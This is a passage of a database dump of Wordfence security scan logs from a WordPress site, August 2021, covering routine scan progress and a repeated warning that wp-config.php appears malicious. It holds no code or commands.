scan'),(2469,1628072330.478718,1,'info','-------------------'),(2470,1628072330.503128,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(2471,1628072330.514383,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2474,1628158701.062787,1,'info','Initiating quick scan'),(2479,1628158701.441734,1,'info','-------------------'),(2480,1628158701.478356,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 24 MB'),(2481,1628158701.500089,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2483,1628217026.112088,1,'info','Scheduled Wordfence scan starting at Friday 6th of August 2021 02:30:26 AM'),(2485,1628217027.850811,1,'info','Contacting Wordfence to initiate scan'),(2492,1628217041.198573,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.31 TB'),(2493,1628217041.226801,2,'info','The disk has 3465629.21 MB available'),(2501,1628217042.218137,2,'info','Getting plugin list from WordPress'),(2502,1628217042.286262,2,'info','Found 4 plugins'),(2503,1628217042.543370,2,'info','Getting theme list from WordPress'),(2504,1628217042.719215,2,'info','Found 4 themes'),(2516,1628217057.691160,2,'info','500 files indexed'),(2517,1628217057.895717,2,'info','1000 files indexed'),(2518,1628217058.146066,2,'info','1500 files indexed'),(2519,1628217058.353978,2,'info','2000 files indexed'),(2520,1628217058.518602,2,'info','2500 files indexed'),(2521,1628217058.624174,2,'info','3000 files indexed'),(2522,1628217058.779946,2,'info','3500 files indexed'),(2523,1628217058.848347,2,'info','3563 files indexed'),(2524,1628217066.944558,2,'info','Analyzed 100 files containing 7.46 MB of data so far'),(2525,1628217080.311539,2,'info','Analyzed 200 files containing 9.04 MB of data so far'),(2526,1628217087.782120,2,'info','Analyzed 300 files containing 10.36 MB of data so far'),(2527,1628217098.087557,2,'info','Analyzed 400 files containing 13.06 MB of data so far'),(2528,1628217107.079951,2,'info','Analyzed 500 files containing 13.91 MB of data so far'),(2529,1628217131.308231,2,'info','Analyzed 600 files containing 14.77 MB of data so far'),(2530,1628217142.422414,2,'info','Analyzed 700 files containing 15.91 MB of data so far'),(2531,1628217150.544619,2,'info','Analyzed 800 files containing 16.94 MB of data so far'),(2532,1628217164.717078,2,'info','Analyzed 900 files containing 18.69 MB of data so far'),(2533,1628217180.626697,2,'info','Analyzed 1000 files containing 24.17 MB of data so far'),(2534,1628217189.270396,2,'info','Analyzed 1100 files containing 25.65 MB of data so far'),(2535,1628217213.444948,2,'info','Analyzed 1200 files containing 26.87 MB of data so far'),(2536,1628217221.671455,2,'info','Analyzed 1300 files containing 27.55 MB of data so far'),(2537,1628217236.981138,2,'info','Analyzed 1400 files containing 28.49 MB of data so far'),(2538,1628217249.987965,2,'info','Analyzed 1500 files containing 28.53 MB of data so far'),(2539,1628217257.774805,2,'info','Analyzed 1600 files containing 28.56 MB of data so far'),(2540,1628217271.041442,2,'info','Analyzed 1700 files containing 29.8 MB of data so far'),(2541,1628217280.066966,2,'info','Analyzed 1800 files containing 32.28 MB of data so far'),(2542,1628217290.476299,2,'info','Analyzed 1900 files containing 33.26 MB of data so far'),(2543,1628217301.825537,2,'info','Analyzed 2000 files containing 34.47 MB of data so far'),(2544,1628217315.629916,2,'info','Analyzed 2100 files containing 36.95 MB of data so far'),(2545,1628217330.705092,2,'info','Analyzed 2200 files containing 39.41 MB of data so far'),(2546,1628217341.135810,2,'info','Analyzed 2300 files containing 40.45 MB of data so far'),(2547,1628217356.981139,2,'info','Analyzed 2400 files containing 43.55 MB of data so far'),(2548,1628217365.219902,2,'info','Analyzed 2500 files containing 44.17 MB of data so far'),(2549,1628217375.633661,2,'info','Analyzed 2600 files containing 46.06 MB of data so far'),(2550,1628217384.512381,2,'info','Analyzed 2700 files containing 48.93 MB of data so far'),(2551,1628217391.631933,2,'info','Analyzed 2800 files containing 50.68 MB of data so far'),(2552,1628217401.988522,2,'info','Analyzed 2900 files containing 52.43 MB of data so far'),(2553,1628217410.723095,2,'info','Analyzed 3000 files containing 64.92 MB of data so far'),(2554,1628217426.785950,2,'info','Analyzed 3100 files containing 66.51 MB of data so far'),(2555,1628217433.994331,2,'info','Analyzed 3200 files containing 68.9 MB of data so far'),(2556,1628217472.077630,2,'info','Analyzed 3300 files containing 71.73 MB of data so far'),(2557,1628217481.463352,2,'info','Analyzed 3400 files containing 74.81 MB of data so far'),(2558,1628217503.541696,2,'info','Analyzed 3500 files containing 75.98 MB of data so far'),(2559,1628217510.970341,2,'info','Analyzed 3563 files containing 77.1 MB of data.'),(2567,1628217514.088573,2,'info','Starting scan of file contents'),(2568,1628217515.276908,2,'info','Scanned contents of 16 additional files at 14.08 per second'),(2569,1628217517.557877,2,'info','Scanned contents of 26 additional files at 7.61 per second'),(2570,1628217517.605029,2,'info','Scanned contents of 26 additional files at 7.50 per second'),(2571,1628217517.630993,2,'info','Asking Wordfence to check URLs against malware list.'),(2572,1628217517.665781,2,'info','Checking 105 host keys against Wordfence scanning servers.'),(2573,1628217518.406295,2,'info','Done host key check.'),(2574,1628217519.532568,2,'info','Done file contents scan'),(2575,1628217519.563967,2,'info','Adding issue: File appears to be malicious or unsafe: wp-config.php'),(2581,1628217523.539554,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2582,1628217523.549472,2,'info','Checking 106 host keys against Wordfence scanning servers.'),(2583,1628217524.160102,2,'info','Done host key check.'),(2584,1628217524.170397,2,'info','Done examining URLs'),(2589,1628217525.279432,2,'info','Starting password strength check on 1 user.'),(2596,1628217529.196281,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2597,1628217529.206739,2,'info','Done examining URLs'),(2599,1628217529.580044,1,'info','-------------------'),(2600,1628217529.591494,2,'info','Wordfence used 32 MB of memory for scan. Server peak memory usage was: 68 MB'),(2601,1628217529.603210,1,'info','Scan Complete. Scanned 3563 files, 5 plugins, 4 themes, 31 posts, 0 comments and 105 URLs in 8 minutes 21 seconds.'),(2604,1628245074.430223,1,'info','Initiating quick scan'),(2609,1628245074.745321,1,'info','-------------------'),(2610,1628245074.762957,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 36 MB'),(2611,1628245074.774385,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2614,1628331735.823848,1,'info','Initiating quick scan'),(2619,1628331736.139137,1,'info','-------------------'),(2620,1628331736.162295,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 36 MB'),(2621,1628331736.183306,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2624,1628418181.607630,1,'info','Initiating quick scan'),(2629,1628418181.946149,1,'info','-------------------'),(2630,1628418181.967682,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 36 MB'),(2631,1628418181.978287,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2633,1628476296.553906,1,'info','Scheduled Wordfence scan starting at Monday 9th of August 2021 02:31:36 AM'),(2635,1628476299.547722,1,'info','Contacting Wordfence to initiate scan'),(2642,1628476307.872417,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.31 TB'),(2643,1628476307.893968,2,'info','The disk has 3465552.29 MB available'),(2651,1628476308.484559,2,'info','Getting plugin list from WordPress'),(2652,1628476308.533166,2,'info','Found 4 plugins'),(2653,1628476308.549035,2,'info','Getting theme list from WordPress'),(2654,1628476308.677694,2,'info','Found 4 themes'),(2666,1628476312.201884,2,'info','500 files indexed'),(2667,1628476312.393116,2,'info','1000 files indexed'),(2668,1628476312.597881,2,'info','1500 files indexed'),(2669,1628476312.764387,2,'info','2000 files indexed'),(2670,1628476312.998391,2,'info','2500 files indexed'),(2671,1628476313.150474,2,'info','3000 files indexed'),(2672,1628476313.875570,2,'info','3500 files indexed'),(2673,1628476313.999040,2,'info','3563 files indexed'),(2674,1628476324.225977,2,'info','Analyzed 100 files containing 7.46 MB of data so far'),(2675,1628476335.851322,2,'info','Analyzed 200 files containing 9.04 MB of data so far'),(2676,1628476346.017627,2,'info','Analyzed 300 files containing 10.36 MB of data so far'),(2677,1628476354.630966,2,'info','Analyzed 400 files containing 13.06 MB of data so far'),(2678,1628476364.827551,2,'info','Analyzed 500 files containing 13.91 MB of data so far'),(2679,1628476385.700522,2,'info','Analyzed 600 files containing 14.77 MB of data so far'),(2680,1628476405.566126,2,'info','Analyzed 700 files containing 15.91 MB of data so far'),(2681,1628476416.817116,2,'info','Analyzed 800 files containing 16.94 MB of data so far'),(2682,1628476433.081605,2,'info','Analyzed 900 files containing 18.69 MB of data so far'),(2683,1628476442.618808,2,'info','Analyzed 1000 files containing 24.17 MB of data so far'),(2684,1628476452.590597,2,'info','Analyzed 1100 files containing 25.65 MB of data so far'),(2685,1628476462.524429,2,'info','Analyzed 1200 files containing 26.87 MB of data so far'),(2686,1628476471.161954,2,'info','Analyzed 1300 files containing 27.55 MB of data so far'),(2687,1628476481.730359,2,'info','Analyzed 1400 files containing 28.49 MB of data so far'),(2688,1628476490.165957,2,'info','Analyzed 1500 files containing 28.53 MB of data so far'),(2689,1628476501.095684,2,'info','Analyzed 1600 files containing 28.56 MB of data so far'),(2690,1628476509.943585,2,'info','Analyzed 1700 files containing 29.8 MB of data so far'),(2691,1628476522.688978,2,'info','Analyzed 1800 files containing 32.28 MB of data so far'),(2692,1628476533.802188,2,'info','Analyzed 1900 files containing 33.26 MB of data so far'),(2693,1628476544.709719,2,'info','Analyzed 2000 files containing 34.47 MB of data so far'),(2694,1628476556.917581,2,'info','Analyzed 2100 files containing 36.95 MB of data so far'),(2695,1628476565.492564,2,'info','Analyzed 2200 files containing 39.41 MB of data so far'),(2696,1628476574.711082,2,'info','Analyzed 2300 files containing 40.45 MB of data so far'),(2697,1628476583.147307,2,'info','Analyzed 2400 files containing 43.55 MB of data so far'),(2698,1628476618.299932,2,'info','Analyzed 2500 files containing 44.17 MB of data so far'),(2699,1628476626.205287,2,'info','Analyzed 2600 files containing 46.06 MB of data so far'),(2700,1628476636.846409,2,'info','Analyzed 2700 files containing 48.93 MB of data so far'),(2701,1628476644.167621,2,'info','Analyzed 2800 files containing 50.68 MB of data so far'),(2702,1628476659.524293,2,'info','Analyzed 2900 files containing 52.43 MB of data so far'),(2703,1628476668.595607,2,'info','Analyzed 3000 files containing 64.92 MB of data so far'),(2704,1628476680.955266,2,'info','Analyzed 3100 files containing 66.51 MB of data so far'),(2705,1628476693.600336,2,'info','Analyzed 3200 files containing 68.9 MB of data so far'),(2706,1628476702.322753,2,'info','Analyzed 3300 files containing 71.73 MB of data so far'),(2707,1628476712.228390,2,'info','Analyzed 3400 files containing 74.81 MB of data so far'),(2708,1628476722.192385,2,'info','Analyzed 3500 files containing 75.98 MB of data so far'),(2709,1628476734.475824,2,'info','Analyzed 3563 files containing 77.1 MB of data.'),(2717,1628476736.999046,2,'info','Starting scan of file contents'),(2718,1628476738.170474,2,'info','Scanned contents of 12 additional files at 10.87 per second'),(2719,1628476739.174931,2,'info','Scanned contents of 25 additional files at 11.86 per second'),(2720,1628476739.270205,2,'info','Scanned contents of 26 additional files at 11.80 per second'),(2721,1628476739.281014,2,'info','Asking Wordfence to check URLs against malware list.'),(2722,1628476739.301074,2,'info','Checking 105 host keys against Wordfence scanning servers.'),(2723,1628476739.928344,2,'info','Done host key check.'),(2724,1628476741.080980,2,'info','Done file contents scan'),(2725,1628476741.095605,2,'info','Adding issue: File appears to be malicious or unsafe: wp-config.php'),(2731,1628476742.377661,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2732,1628476742.394676,2,'info','Checking 106 host keys against Wordfence scanning servers.'),(2733,1628476743.014243,2,'info','Done host key check.'),(2734,1628476743.026597,2,'info','Done examining URLs'),(2739,1628476759.691607,2,'info','Starting password strength check on 1 user.'),(2746,1628476765.537760,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2747,1628476765.548217,2,'info','Done examining URLs'),(2749,1628476765.844335,1,'info','-------------------'),(2750,1628476765.854865,2,'info','Wordfence used 10 MB of memory for scan. Server peak memory usage was: 46 MB'),(2751,1628476765.866011,1,'info','Scan Complete. Scanned 3563 files, 5 plugins, 4 themes, 31 posts, 0 comments and 105 URLs in 7 minutes 45 seconds.'),(2754,1628504746.364617,1,'info','Initiating quick scan'),(2759,1628504746.942125,1,'info','-------------------'),(2760,1628504746.985238,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 36 MB'),(2761,1628504747.008721,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2764,1628590923.333316,1,'info','Initiating quick scan'),(2769,1628590923.914473,1,'info','-------------------'),(2770,1628590923.937892,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 36 MB'),(2771,1628590923.949754,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2774,1628676993.779296,1,'info','Initiating quick scan'),(2779,1628676994.145656,1,'info','-------------------'),(2780,1628676994.185007,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(2781,1628676994.206023,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2783,1628735650.099169,1,'info','Scheduled Wordfence scan starting at Thursday 12th of August 2021 02:34:10 AM'),(2785,1628735650.831406,1,'info','Contacting Wordfence to initiate scan'),(2792,1628735658.352227,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(2793,1628735658.367923,2,'info','The disk has 3465028.03 MB available'),(2801,1628735659.562537,2,'info','Getting plugin list from WordPress'),(2802,1628735659.693667,2,'info','Found 4 plugins'),(2803,1628735659.720639,2,'info','Getting theme list from WordPress'),(2804,1628735659.840482,2,'info','Found 4 themes'),(2816,1628735665.225808,2,'info','500 files indexed'),(2817,1628735665.468428,2,'info','1000 files indexed'),(2818,1628735665.775683,2,'info','1500 files indexed'),(2819,1628735665.982390,2,'info','2000 files indexed'),(2820,1628735666.291494,2,'info','2500 files indexed'),(2821,1628735666.598817,2,'info','3000 files indexed'),(2822,1628735666.796332,2,'info','3500 files indexed'),(2823,1628735666.909904,2,'info','3563 files indexed'),(2824,1628735680.703917,2,'info','Analyzed 100 files containing 7.46 MB of data so far'),(2825,1628735685.717803,2,'info','Analyzed 200 files containing 9.04 MB of data so far'),(2826,1628735691.174752,2,'info','Analyzed 300 files containing 10.36 MB of data so far'),(2827,1628735695.615397,2,'info','Analyzed 400 files containing 13.06 MB of data so far'),(2828,1628735699.565396,2,'info','Analyzed 500 files containing 13.91 MB of data so far'),(2829,1628735703.877836,2,'info','Analyzed 600 files containing 14.77 MB of data so far'),(2830,1628735707.403574,2,'info','Analyzed 700 files containing 15.91 MB of data so far'),(2831,1628735710.928327,2,'info','Analyzed 800 files containing 16.94 MB of data so far'),(2832,1628735714.803411,2,'info','Analyzed 900 files containing 18.69 MB of data so far'),(2833,1628735718.905664,2,'info','Analyzed 1000 files containing 24.17 MB of data so far'),(2834,1628735722.354062,2,'info','Analyzed 1100 files containing 25.65 MB of data so far'),(2835,1628735726.170923,2,'info','Analyzed 1200 files containing 26.87 MB of data so far'),(2836,1628735730.961826,2,'info','Analyzed 1300 files containing 27.55 MB of data so far'),(2837,1628735735.987720,2,'info','Analyzed 1400 files containing 28.49 MB of data so far'),(2838,1628735740.520149,2,'info','Analyzed 1500 files containing 28.53 MB of data so far'),(2839,1628735744.229030,2,'info','Analyzed 1600 files containing 28.56 MB of data so far'),(2840,1628735748.902230,2,'info','Analyzed 1700 files containing 29.8 MB of data so far'),(2841,1628735759.075819,2,'info','Analyzed 1800 files containing 32.28 MB of data so far'),(2842,1628735765.339244,2,'info','Analyzed 1900 files containing 33.26 MB of data so far'),(2843,1628735769.802014,2,'info','Analyzed 2000 files containing 34.47 MB of data so far'),(2844,1628735781.536780,2,'info','Analyzed 2100 files containing 36.95 MB of data so far'),(2845,1628735786.377600,2,'info','Analyzed 2200 files containing 39.41 MB of data so far'),(2846,1628735791.023918,2,'info','Analyzed 2300 files containing 40.45 MB of data so far'),(2847,1628735799.271965,2,'info','Analyzed 2400 files containing 43.55 MB of data so far'),(2848,1628735803.161154,2,'info','Analyzed 2500 files containing 44.17 MB of data so far'),(2849,1628735807.557629,2,'info','Analyzed 2600 files containing 46.06 MB of data so far'),(2850,1628735836.910061,2,'info','Analyzed 2700 files containing 48.93 MB of data so far'),(2851,1628735844.198950,2,'info','Analyzed 2800 files containing 50.68 MB of data so far'),(2852,1628735854.046732,2,'info','Analyzed 2900 files containing 52.43 MB of data so far'),(2853,1628735858.868088,2,'info','Analyzed 3000 files containing 64.93 MB of data so far'),(2854,1628735863.408171,2,'info','Analyzed 3100 files containing 66.51 MB of data so far'),(2855,1628735868.662235,2,'info','Analyzed 3200 files containing 68.91 MB of data so far'),(2856,1628735877.102072,2,'info','Analyzed 3300 files containing 71.73 MB of data so far'),(2857,1628735881.255528,2,'info','Analyzed 3400 files containing 74.81 MB of data so far'),(2858,1628735886.389486,2,'info','Analyzed 3500 files containing 75.98 MB of data so far'),(2859,1628735918.597072,2,'info','Analyzed 3563 files containing 77.1 MB of data.'),(2867,1628735920.404892,2,'info','Starting scan of file contents'),(2868,1628735921.480891,2,'info','Scanned contents of 16 additional files at 15.35 per second'),(2869,1628735922.212558,2,'info','Scanned contents of 26 additional files at 14.66 per second'),(2870,1628735922.222589,2,'info','Asking Wordfence to check URLs against malware list.'),(2871,1628735922.247441,2,'info','Checking 105 host keys against Wordfence scanning servers.'),(2872,1628735923.223739,2,'info','Done host key check.'),(2873,1628735924.105944,2,'info','Done file contents scan'),(2874,1628735924.174618,2,'info','Adding issue: File appears to be malicious or unsafe: wp-config.php'),(2880,1628735925.103258,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2881,1628735925.115045,2,'info','Checking 106 host keys against Wordfence scanning servers.'),(2882,1628735925.728372,2,'info','Done host key check.'),(2883,1628735925.745503,2,'info','Done examining URLs'),(2888,1628735926.762802,2,'info','Starting password strength check on 1 user.'),(2895,1628735930.930785,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2896,1628735930.969230,2,'info','Done examining URLs'),(2898,1628735931.353074,1,'info','-------------------'),(2899,1628735931.389586,2,'info','Wordfence used 10 MB of memory for scan. Server peak memory usage was: 54 MB'),(2900,1628735931.422646,1,'info','Scan Complete. Scanned 3563 files, 5 plugins, 4 themes, 31 posts, 0 comments and 105 URLs in 4 minutes 40 seconds.'),(2903,1628763400.419357,1,'info','Initiating quick scan'),(2908,1628763400.666811,1,'info','-------------------'),(2909,1628763400.673028,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 36 MB'),(2910,1628763400.675534,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2913,1628850265.984899,1,'info','Initiating quick scan'),(2918,1628850266.575886,1,'info','-------------------'),(2919,1628850266.615838,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 34 MB'),(2920,1628850266.633792,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2923,1628936398.785087,1,'info','Initiating quick scan'),(2928,1628936399.026617,1,'info','-------------------'),(2929,1628936399.047664,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 36 MB'),(2930,1628936399.058106,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2932,1628994929.774599,1,'info','Scheduled Wordfence scan starting at Sunday 15th of August 2021 02:35:29 AM'),(2934,1628994931.238978,1,'info','Contacting Wordfence to initiate scan'),(2941,1628994941.354910,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(2942,1628994941.384422,2,'info','The disk has 3464984.56 MB available'),(2950,1628994941.993391,2,'info','Getting plugin list from WordPress'),(2951,1628994942.044072,2,'info','Found 4 plugins'),(2952,1628994942.066838,2,'info','Getting theme list from WordPress'),(2953,1628994942.204039,2,'info','Found 4 themes'),(2965,1628994945.663621,2,'info','500 files indexed'),(2966,1628994945.836733,2,'info','1000 files indexed'),(2967,1628994946.032694,2,'info','1500 files indexed'),(2968,1628994946.301615,2,'info','2000 files indexed'),(2969,1628994946.499465,2,'info','2500 files indexed'),(2970,1628994946.721480,2,'info','3000 files indexed'),(2971,1628994946.887369,2,'info','3500 files indexed'),(2972,1628994946.943711,2,'info','3563 files indexed'),(2973,1628994958.406033,2,'info','Analyzed 100 files containing 7.46 MB of data so far'),(2974,1628994968.964298,2,'info','Analyzed 200 files containing 9.04 MB of data so far'),(2975,1628994980.844007,2,'info','Analyzed 300 files containing 10.36 MB of data so far'),(2976,1628994991.005265,2,'info','Analyzed 400 files containing 13.06 MB of data so far'),(2977,1628995000.021306,2,'info','Analyzed 500 files containing 13.91 MB of data so far'),(2978,1628995008.462771,2,'info','Analyzed 600 files containing 14.77 MB of data so far'),(2979,1628995015.236756,2,'info','Analyzed 700 files containing 15.91 MB of data so far'),(2980,1628995025.422867,2,'info','Analyzed 800 files containing 16.94 MB of data so far'),(2981,1628995032.410710,2,'info','Analyzed 900 files containing 18.69 MB of data so far'),(2982,1628995044.469643,2,'info','Analyzed 1000 files containing 24.17 MB of data so far'),(2983,1628995057.054299,2,'info','Analyzed 1100 files containing 25.65 MB of data so far'),(2984,1628995067.794105,2,'info','Analyzed 1200 files containing 26.87 MB of data so far'),(2985,1628995075.377932,2,'info','Analyzed 1300 files containing 27.55 MB of data so far'),(2986,1628995084.382640,2,'info','Analyzed 1400 files containing 28.49 MB of data so far'),(2987,1628995095.917359,2,'info','Analyzed 1500 files containing 28.53 MB of data so far'),(2988,1628995106.597063,2,'info','Analyzed 1600 files containing 28.56 MB of data so far'),(2989,1628995114.629772,2,'info','Analyzed 1700 files containing 29.8 MB of data so far'),(2990,1628995125.109140,2,'info','Analyzed 1800 files containing 32.28 MB of data so far'),(2991,1628995134.004850,2,'info','Analyzed 1900 files containing 33.26 MB of data so far'),(2992,1628995143.419643,2,'info','Analyzed 2000 files containing 34.47 MB of data so far'),(2993,1628995150.234008,2,'info','Analyzed 2100 files containing 36.95 MB of data so far'),(2994,1628995160.036683,2,'info','Analyzed 2200 files containing 39.41 MB of data so far'),(2995,1628995168.507929,2,'info','Analyzed 2300 files containing 40.45 MB of data so far'),(2996,1628995181.924066,2,'info','Analyzed 2400 files containing 43.55 MB of data so far'),(2997,1628995188.447450,2,'info','Analyzed 2500 files containing 44.17 MB of data so far'),(2998,1628995197.049848,2,'info','Analyzed 2600 files containing 46.06 MB of data so far'),(2999,1628995203.978681,2,'info','Analyzed 2700 files containing 48.93 MB of data so far'),(3000,1628995211.405711,2,'info','Analyzed 2800 files containing 50.68 MB of data so far'),(3001,1628995215.542180,2,'info','Analyzed 2900 files containing 52.43 MB of data so far'),(3002,1628995219.054042,2,'info','Analyzed 3000 files containing 64.93 MB of data so far'),(3003,1628995222.403851,2,'info','Analyzed 3100 files containing 66.51 MB of data so far'),(3004,1628995229.260407,2,'info','Analyzed 3200 files containing 68.91 MB of data so far'),(3005,1628995233.179522,2,'info','Analyzed 3300 files containing 71.73 MB of data so far'),(3006,1628995237.401715,2,'info','Analyzed 3400 files containing 74.81 MB of data so far'),(3007,1628995241.778857,2,'info','Analyzed 3500 files containing 75.98 MB of data so far'),(3008,1628995246.119004,2,'info','Analyzed 3563 files containing 77.1 MB of data.'),(3016,1628995248.992953,2,'info','Starting scan of file contents'),(3017,1628995250.037853,2,'info','Scanned contents of 19 additional files at 18.69 per second'),(3018,1628995250.449765,2,'info','Scanned contents of 26 additional files at 18.20 per second'),(3019,1628995250.460224,2,'info','Asking Wordfence to check URLs against malware list.'),(3020,1628995250.464886,2,'info','Checking 105 host keys against Wordfence scanning servers.'),(3021,1628995251.065251,2,'info','Done host key check.'),(3022,1628995252.049111,2,'info','Done file contents scan'),(3023,1628995252.063256,2,'info','Adding issue: File appears to be malicious or unsafe: wp-config.php'),(3029,1628995252.766622,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(3030,1628995252.776957,2,'info','Checking 106 host keys against Wordfence scanning servers.'),(3031,1628995253.381756,2,'info','Done host key check.'),(3032,1628995253.413909,2,'info','Done examining URLs'),(3037,1628995254.322915,2,'info','Starting password strength check on 1 user.'),(3044,1628995258.327048,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(3045,1628995258.335136,2,'info','Done examining URLs'),(3047,1628995258.595084,1,'info','-------------------'),(3048,1628995258.611107,2,'info','Wordfence used 42 MB of memory for scan. Server peak memory usage was: 68 MB'),(3049,1628995258.625194,1,'info','Scan Complete. Scanned 3563 files, 5 plugins, 4 themes, 31 posts, 0 comments and 105 URLs in 5 minutes 26 seconds.'),(3052,1629022654.795323,1,'info','Initiating quick scan'),(3057,1629022655.526710,1,'info','-------------------'),(3058,1629022655.540190,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 36 MB'),(3059,1629022655.544297,1,'info','Quick Scan Complete. Scanned in 1 second.'),(3062,1629109330.219082,1,'info','Initiating quick scan'),(3067,1629109330.613869,1,'info','-------------------'),(3068,1629109330.659584,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 34 MB'),(3069,1629109330.681963,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(3072,1629195600.949275,1,'info','Initiating quick scan'),(3077,1629195601.217458,1,'info','-------------------'),(3078,1629195601.240361,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 24 MB'),(3079,1629195601.251051,1,'info','Quick Scan Complete. Scanned in 1 second.'),(3081,1629253874.556444,1,'info','Scheduled Wordfence scan starting at Wednesday 18th of August 2021 02:31:14 AM'),(3083,1629253889.185837,1,'info','Contacting Wordfence to initiate scan'),(3090,1629253917.357881,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(3091,1629253917.383096,2,'info','The disk has 3464623.79 MB available'),(3099,1629253924.473658,2,'info','Getting plugin list from WordPress'),(3100,1629253924.569913,2,'info','Found 4 plugins'),(3101,1629253924.610460,2,'info','Getting theme list from WordPress'),(3102,1629253924.886934,2,'info','Found 4 themes'),(3105,1629253929.370190,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(3106,1629253929.595445,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(3107,1629253930.078669,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(3108,1629253930.177937,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(3109,1629253930.372724,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(3110,1629253930.473674,10,'info','SUM_DISABLED:Skipping theme scan'),(3111,1629253930.531217,10,'info','SUM_DISABLED:Skipping plugin scan'),(3112,1629253930.600706,10,'info','SUM_START:Scanning for known malware files'),(3113,1629253930.716988,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(3114,1629253948.118133,2,'info','500 files indexed'),(3115,1629253948.322366,2,'info','1000 files indexed'),(3116,1629253948.506413,2,'info','1500 files indexed'),(3117,1629253948.671929,2,'info','2000 files indexed'),(3118,1629253948.866122,2,'info','2500 files indexed'),(3119,1629253949.062454,2,'info','3000 files indexed'),(3120,1629253949.247735,2,'info','3500 files indexed'),(3121,1629253949.313671,2,'info','3564 files indexed'),(3122,1629253957.462683,2,'info','Analyzed 100 files containing 7.47 MB of data so far'),(3123,1629253972.329702,2,'info','Analyzed 200 files containing 9.04 MB of data so far'),(3124,1629253979.900436,2,'info','Analyzed 300 files containing 10.32 MB of data so far'),(3125,1629253994.873491,2,'info','Analyzed 400 files containing 13.07 MB of data so far'),(3126,1629254003.630064,2,'info','Analyzed 500 files containing 13.93 MB of data so far'),(3127,1629254012.587037,2,'info','Analyzed 600 files containing 14.79 MB of data so far'),(3128,1629254026.359586,2,'info','Analyzed 700 files containing 15.93 MB of data so far'),(3129,1629254038.676405,2,'info','Analyzed 800 files containing 16.95 MB of data so far'),(3130,1629254055.976918,2,'info','Analyzed 900 files containing 18.7 MB of data so far'),(3131,1629254065.388813,2,'info','Analyzed 1000 files containing 24.18 MB of data so far'),(3132,1629254078.963271,2,'info','Analyzed 1100 files containing 25.67 MB of data so far'),(3133,1629254086.528662,2,'info','Analyzed 1200 files containing 26.89 MB of data so far'),(3134,1629254101.032481,2,'info','Analyzed 1300 files containing 27.57 MB of data so far'),(3135,1629254114.544699,2,'info','Analyzed 1400 files containing 28.51 MB of data so far'),(3136,1629254124.717880,2,'info','Analyzed 1500 files containing 28.55 MB of data so far'),(3137,1629254138.269426,2,'info','Analyzed 1600 files containing 28.58 MB of data so far'),(3138,1629254151.434917,2,'info','Analyzed 1700 files containing 29.81 MB of data so far'),(3139,1629254162.228157,2,'info','Analyzed 1800 files containing 32.3 MB of data so far'),(3140,1629254172.008348,2,'info','Analyzed 1900 files containing 33.27 MB of data so far'),(3141,1629254187.558935,2,'info','Analyzed 2000 files containing 34.49 MB of data so far'),(3142,1629254195.108889,2,'info','Analyzed 2100 files containing 36.85 MB of data so far'),(3143,1629254204.903592,2,'info','Analyzed 2200 files containing 39.42 MB of data so far'),(3144,1629254211.438942,2,'info','Analyzed 2300 files containing 40.47 MB of data so far'),(3145,1629254217.859601,2,'info','Analyzed 2400 files containing 43.58 MB of data so far'),(3146,1629254230.015412,2,'info','Analyzed 2500 files containing 44.2 MB of data so far'),(3147,1629254235.812570,2,'info','Analyzed 2600 files containing 46.09 MB of data so far'),(3148,1629254247.385043,2,'info','Analyzed 2700 files containing 48.94 MB of data so far'),(3149,1629254252.397639,2,'info','Analyzed 2800 files containing 50.71 MB of data so far'),(3150,1629254256.544196,2,'info','Analyzed 2900 files containing 52.46 MB of data so far'),(3151,1629254269.276189,2,'info','Analyzed 3000 files containing 64.96 MB of data so far'),(3152,1629254273.702781,2,'info','Analyzed 3100 files containing 66.54 MB of data so far'),(3153,1629254278.295635,2,'info','Analyzed 3200 files containing 68.93 MB of data so far'),(3154,1629254282.775309,2,'info','Analyzed 3300 files containing 71.76 MB of data so far'),(3155,1629254294.598598,2,'info','Analyzed 3400 files containing 74.75 MB of data so far'),(3156,1629254299.767033,2,'info','Analyzed 3500 files containing 75.98 MB of data so 